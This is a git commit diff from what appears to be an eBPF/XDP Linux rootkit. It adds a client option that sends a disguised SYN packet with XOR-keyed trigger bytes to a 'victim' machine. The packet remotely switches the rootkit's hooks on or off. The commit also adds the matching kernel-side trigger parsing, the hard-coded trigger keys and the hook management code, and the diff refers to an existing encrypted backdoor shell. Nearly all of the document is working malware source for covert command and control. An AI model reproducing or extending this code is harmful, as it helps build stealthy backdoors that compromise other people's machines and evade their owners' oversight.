Added new hidden packets, commands and rest of structure to activate and deactivate hooks from the backdoor

2025-12-16 23:33:06 +08:00 · 2022-05-07 19:16:33 -04:00
parent ce7d36371d
commit 5746ac5efb
11 changed files with 1694 additions and 1406 deletions
--- a/src/.output/kit.o
+++ b/src/.output/kit.o
--- a/src/.output/kit.skel.h
+++ b/src/.output/kit.skel.h
--- a/src/bin/kit
+++ b/src/bin/kit
--- a/src/client/client.c
+++ b/src/client/client.c
@@ -188,7 +188,7 @@ void activate_command_control_shell(char* argv){
    free(local_ip);
 }

-//Rootkit backdoor V2
+//Rootkit backdoor V2 being used - Bvp47 like
 void activate_command_control_shell_encrypted(char* argv){
    char* local_ip = getLocalIpAddress();
    printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
@@ -240,9 +240,61 @@ void activate_command_control_shell_encrypted(char* argv){
    }
    
    server_run(8500);
+}

+void hook_control_command(char* argv, int mode){
+    char* local_ip = getLocalIpAddress();
+    printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
+    check_ip_address_format(argv);
+    printf("["KBLU"INFO"RESET"]""Crafting malicious SYN packet...\n");
+    //+1 since payload must finish with null character for parameter passing, although not sent in the actual packet payload
+    char payload[CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE+1] = {0};
+    srand(time(NULL));
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE; ii++){
+        payload[ii] = (char)rand();
+    }
+    //Follow protocol rules
+    char section[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char section2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN+1] = CC_TRIGGER_SYN_PACKET_KEY_1;
+    char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN+1] = CC_TRIGGER_SYN_PACKET_KEY_2;
+    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN+1];
+    //K3 with command to start the encrypted connection with the backdoor
+    if(mode == 0){
+        strncpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_DEACTIVATE_ALL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    }else{
+        strncpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_ACTIVATE_ALL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    }
+    char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    strncpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
+        result[ii] = section[ii] ^ key1[ii];
+    }
+    strncpy(payload+0x06, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+
+    strncpy(section, payload+0x02, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
+        result[ii] = section[ii] ^ key2[ii];
+    }
+    strncpy(payload+0x0A, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+
+    strncpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    strncpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
+        result[ii] = section[ii] ^ section2[ii] ^ key3[ii];
+    }
+
+    strncpy(payload+0x0C, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
    
-    
+    packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, payload);
+    printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
+    //Sending the malicious payload
+    if(rawsocket_send(packet)<0){
+        printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
+        return;
+    }else{
+        printf("["KGRN"OK"RESET"]""Secret message successfully sent! No answer expected\n");
+    }
 }


@@ -264,7 +316,7 @@ void main(int argc, char* argv[]){
    char path_arg[512];

    //Command line argument parsing
-    while ((opt = getopt(argc, argv, ":S:c:e:h")) != -1) {
+    while ((opt = getopt(argc, argv, ":S:c:e:u:a:h")) != -1) {
        switch (opt) {
        case 'S':
            print_welcome_message();
@@ -298,6 +350,28 @@ void main(int argc, char* argv[]){
            activate_command_control_shell_encrypted(dest_address);
            PARAM_MODULE_ACTIVATED = 1;
            
+            break;
+        case 'u':
+            print_welcome_message();
+            sleep(1);
+            //Send a secret message
+            printf("["KBLU"INFO"RESET"]""Deactivating all rootkit hooks\n");
+            //printf("Option S has argument %s\n", optarg);
+            strcpy(dest_address, optarg);
+            hook_control_command(dest_address, 0);
+            PARAM_MODULE_ACTIVATED = 1;
+            
+            break;
+        case 'a':
+            print_welcome_message();
+            sleep(1);
+            //Send a secret message
+            printf("["KBLU"INFO"RESET"]""Activating all rootkit hooks\n");
+            //printf("Option S has argument %s\n", optarg);
+            strcpy(dest_address, optarg);
+            hook_control_command(dest_address, 1);
+            PARAM_MODULE_ACTIVATED = 1;
+            
            break;
        /*case 'u': 
            print_welcome_message();
--- a/src/client/client.o
+++ b/src/client/client.o
--- a/src/client/injector
+++ b/src/client/injector
--- a/src/common/c&c.h
+++ b/src/common/c&c.h
@@ -17,9 +17,13 @@
 #define CC_TRIGGER_SYN_PACKET_KEY_1 "\x56\xA4"
 #define CC_TRIGGER_SYN_PACKET_KEY_2 "\x78\x13"
 #define CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL "\x1F\x29"
+#define CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_ACTIVATE_ALL "\x1D\x25"
+#define CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_DEACTIVATE_ALL "\x1D\x24"
 #define CC_TRIGGER_SYN_PACKET_SECTION_LEN 0x02

 #define CC_PROT_COMMAND_ENCRYPTED_SHELL 0
+#define CC_PROT_COMMAND_HOOK_ACTIVATE_ALL 1
+#define CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL 2

 //C&C V3 -- Distributed hidden payload in packet stream
 struct trigger_t {
--- a/src/ebpf/include/xdp/backdoor.h
+++ b/src/ebpf/include/xdp/backdoor.h
@@ -55,6 +55,10 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
    __builtin_memcpy(section3, payload+0x0C, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
    int correct = 1;
    int command_received = -1;
+
+    //Checking for a valid K3, which indicates the command sent by the backdoor client
+    //Not the cleanest code, needs refactoring
+    //Encrypted shell request
    __builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
        result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
@@ -65,7 +69,43 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
    if(correct == 1){
        //Found valid k3 value
        command_received = CC_PROT_COMMAND_ENCRYPTED_SHELL;
-    }else{
+        goto backdoor_finish;
+    }
+
+    correct = 1;
+    //Hook activate all request
+    __builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_ACTIVATE_ALL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
+        result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
+        if(result3[ii]!=(key3[ii])){
+            correct = 0;
+        }
+    }
+    if(correct == 1){
+        //Found valid k3 value
+        command_received = CC_PROT_COMMAND_HOOK_ACTIVATE_ALL;
+        goto backdoor_finish;
+    }
+
+    correct = 1;
+    //Hook deactivate all request
+    __builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_DEACTIVATE_ALL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
+        result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
+        if(result3[ii]!=(key3[ii])){
+            correct = 0;
+        }
+    }
+    if(correct == 1){
+        //Found valid k3 value
+        command_received = CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL;
+        goto backdoor_finish;
+    }
+    
+
+backdoor_finish:
+    //Found no valid key 3
+    if(correct==0){
        bpf_printk("FAIL CHECK 3\n");
        return XDP_PASS;
    }
@@ -78,6 +118,14 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
            bpf_printk("Received request to start encrypted connection\n");
            ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
            break;
+        case CC_PROT_COMMAND_HOOK_ACTIVATE_ALL:
+            bpf_printk("Received request to activate all hooks\n");
+            ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
+            break;
+        case CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL:
+            bpf_printk("Received request to deactivate all hooks\n");
+            ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
+            break;
        default:
            bpf_printk("Command received unknown: %d\n", command_received);
    }
--- a/src/user/include/modules/module_manager.c
+++ b/src/user/include/modules/module_manager.c
@@ -81,3 +81,59 @@ int setup_all_modules(){

    return 0;
 }
+
+int activate_all_modules_config(){
+    //XDP
+    module_config.xdp_module.all = ON;
+
+    //SCHED
+    module_config.sched_module.all = ON; 
+
+    //FS (File system)
+    module_config.fs_module.all = ON;
+
+    //EXEC
+    module_config.exec_module.all = ON;
+
+    return 0;
+}
+
+int deactivate_all_modules_config(){
+    //XDP
+    module_config.xdp_module.all = OFF;
+
+    //SCHED
+    module_config.sched_module.all = OFF; 
+
+    //FS (File system)
+    module_config.fs_module.all = OFF;
+
+    //EXEC
+    module_config.exec_module.all = OFF;
+
+    return 0;
+}
+
+int unhook_all_modules(){
+    //Alias
+    module_config_attr_t attr = module_config_attr;
+    int ret;
+
+    //XDP
+    ret = detach_xdp_all(attr.skel);
+    if(ret!=0) return -1;
+
+    //SCHED
+    ret = detach_sched_all(attr.skel);
+    if(ret!=0) return -1;
+
+    //FS (File system)
+    ret = detach_fs_all(attr.skel);
+    if(ret!=0) return -1;
+
+    //EXEC
+    detach_exec_all(attr.skel);
+    if(ret!=0) return -1;
+
+    return 0;    
+}
--- a/src/user/include/modules/module_manager.h
+++ b/src/user/include/modules/module_manager.h
@@ -71,4 +71,26 @@ extern module_config_attr_t module_config_attr;
 */
 int setup_all_modules();

+/**
+ * @brief Removes all hooks, independently on the module_config.
+ * Useful for reloading the modules.
+ * 
+ * @return 0 if ok, -1 if error
+ */
+int unhook_all_modules();
+
+/**
+ * @brief Sets the module_config with all hooks activated
+ * 
+ * @return 0 if ok, -1 if error
+ */
+int activate_all_modules_config();
+
+/**
+ * @brief Sets the module_config with all hooks deactivated
+ * 
+ * @return 0 if ok, -1 if error
+ */
+int deactivate_all_modules_config();
+
 #endif
--- a/src/user/kit.c
+++ b/src/user/kit.c
@@ -91,6 +91,7 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
 	//For time displaying
 	struct tm *tm;
 	char ts[32];
+	int ret;
 	time_t t;
 	time(&t);
 	tm = localtime(&t);
@@ -112,6 +113,20 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
 			//TODO EXTRACT IP FROM KERNEL BUFFER
 				printf("Starting encrypted connection\n");
 				client_run("127.0.1.1", 8500);
+            	break;
+			case CC_PROT_COMMAND_HOOK_ACTIVATE_ALL:
+				printf("Activating all hooks as requested\n");
+				activate_all_modules_config();
+				ret = unhook_all_modules();
+				if(ret<0) printf("Failed to complete command: unhook all\n");
+				ret = setup_all_modules();
+				if(ret<0) printf("Failed to complete command: setup modules\n");
+            	break;
+			case CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL:
+				printf("Deactivating all hooks as requested\n");
+				deactivate_all_modules_config();
+				ret = unhook_all_modules();
+				if(ret<0) printf("Failed to complete command: unhook all\n");
            	break;
 			default:
 				printf("Command received unknown: %d\n", e->code);